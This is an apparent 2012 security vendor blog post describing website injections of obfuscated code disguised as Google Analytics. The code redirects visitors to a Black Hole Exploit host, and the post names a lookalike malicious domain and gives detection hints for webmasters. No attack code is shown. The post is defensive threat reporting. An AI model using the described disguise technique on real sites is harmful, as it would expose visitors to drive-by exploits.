February 6, 2012

Injection code masquerades as Google Analytics

Tim Xia

The Websense® ThreatSeeker® Network has discovered a new wave of injection of malicious code disguising itself as Google Analytics, by adopting similar code snippets and malicious domains.


It is quite convincing at first glance, but remember, usually we put the analytics code at the bottom of the page, instead of at the top, so this is a good hint to Web masters. Another hint is that they are using "UA-XXXXX-X", a placeholder as their "Google Analytics account", obviously this is not what people usually do. We found other similar domains like google-analytics[dot]su in this attack, and will update once we find more. The evil ga.js code is as below:

it is highly obfuscated, hard to understand, but after all tricks it finally will redirect to IP address which hostsBlack Hole Exploit


 Websense customers are protected from these threats by ACE, our Advanced Classification Engine.

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.